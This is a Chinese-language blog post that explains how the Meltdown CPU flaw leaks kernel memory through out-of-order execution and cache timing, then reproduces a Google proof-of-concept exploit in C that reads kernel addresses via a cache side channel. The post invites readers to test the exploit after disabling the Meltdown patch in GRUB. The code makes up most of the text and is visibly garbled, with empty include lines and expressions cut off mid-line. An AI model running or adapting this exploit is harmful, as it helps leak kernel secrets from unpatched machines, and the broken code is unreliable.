X86 CPU 漏洞 Meltdown 原理及google攻击代码

meltdown的原理其实很简单了,访问一个虚拟地址要走page table walk, 现在一般都是4级页表了,页的属性中有一位标志是区分是内核页还是用户页的。程序执行在用户模式下是不允许访问内核地址的原因就是,用户态使用用户态下的页完成虚拟地址向物理地址的转换,同理内核态使用内核态的页。那好了,meltdown发生的窗口期就是因为乱序执行,当用户态非法访问一个内核态的地址时,还没来得及做页属性的检查,就把数据读到cache里,之后再去cache里把数据拿出来。

原理两条汇编指令就可以解释的非常清楚:

mov al, byte ptr [r15]	 ; r15 保存一个内核的地址
shl rax, 6

第一条指令 mov  al ,  [kernel address] 会触发page fault,从而走page table walk,这时要考虑页属性的权限检查了。

第二条指令 shl rax, 6 正常没有meltdown的情况下是不能执行的,因为第一条指令页表权限检查不会过的。但是由于乱序执行在page fault页表权限检查的同时执行了第二条指令,导致内核的数据被读入cache里。这个窗口期,Intel core架构的cpu都会存在,但是amd的cpu就没有这样的窗口期。intel这样设计就是奔着性能去的,安全性降低了。反而看看AMD 既要性能又要安全。AMD确实良心。

google发布的攻击代码如下, 感兴趣的同学可以去测试,现在的linux内核都打补丁了,在测试之前,请从grub里关掉meltdown补丁。

#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

/* memory clobber is not actually true, but serves as a compiler barrier */
#define pipeline_flush() asm volatile("mov $0, %%eax\n\tcpuid" : /*out*/ : /*in*/ : "rax","rbx","rcx","rdx","memory")
#define clflush(addr) asm volatile("clflush (%0)"::"r"(addr):"memory")
#define read_byte(addr) asm volatile("mov (%0), %%r11"::"r"(addr):"r11","memory")
#define rdtscp() ({unsigned int result; asm volatile("rdtscp":"=a"(result)::"rdx","rcx","memory"); result;})

int timed_load(void *ptr) {
  pipeline_flush();
  unsigned int t1 = rdtscp();
  pipeline_flush();
  read_byte(ptr);
  unsigned int t2 = rdtscp();
  pipeline_flush();
  return t2 - t1;
}

/* leak_func_condition is in an otherwise unused page to prevent interference */
unsigned long leak_func_condition_[0x3000];
#define leak_func_condition (leak_func_condition_ + 0x1800)

/* Most code isn't optimized to make the compiler's output more predictable,
 * but this function should probably be optimized.
 */
__attribute__((noclone,noinline,optimize(3))) unsigned char leak_func(uint8_t *timing_leak_array, uint8_t *source_ptr, unsigned int bitmask, unsigned int bitshift) {
  pipeline_flush();
  /* run the branch if the high-latency load returns zero.
   * if the logic was the other way around, Intel's heuristic
   * where high-latency loads speculatively return zero (?)
   * would probably bite.
   */
  if (__builtin_expect(*leak_func_condition == 0, 1)) {
    return timing_leak_array[((*source_ptr)&bitmask)<> 5) & 0xf;
    int mislead = i & 0x1f;
    uint8_t *cur_secret_array = secret_arrays[mislead];
    char discard;
    pread(freshen_fd, &discard, 1, 0);
    //
    //printf("discard is %c \n", discard);
    //
    pipeline_flush();
    clflush(timing_leak_array);
    clflush(timing_leak_array + (1<<10));
    *leak_func_condition = (mislead == 31);
    pipeline_flush();
    clflush(leak_func_condition);
    pipeline_flush();
    leak_func(timing_leak_array, cur_secret_array, 1< ", argv[0]);
  unsigned long start_addr = strtoul(argv[1], NULL, 16);
  unsigned long leak_len = strtoul(argv[2], NULL, 0);

  /* we will read from this fd before every attempt to leak data
   * to make the kernel load the core_pattern (and a couple other
   * data structures) into the CPU's data cache
   */
  freshen_fd = open("/proc/sys/kernel/core_pattern", O_RDONLY);
  if (freshen_fd == -1)
    err(1, "open corepat");

  hexdump_memory(start_addr, leak_len);
}

github :https://github.com/Tinycl/google_poc

 

 

你可能感兴趣的:(linux,安全)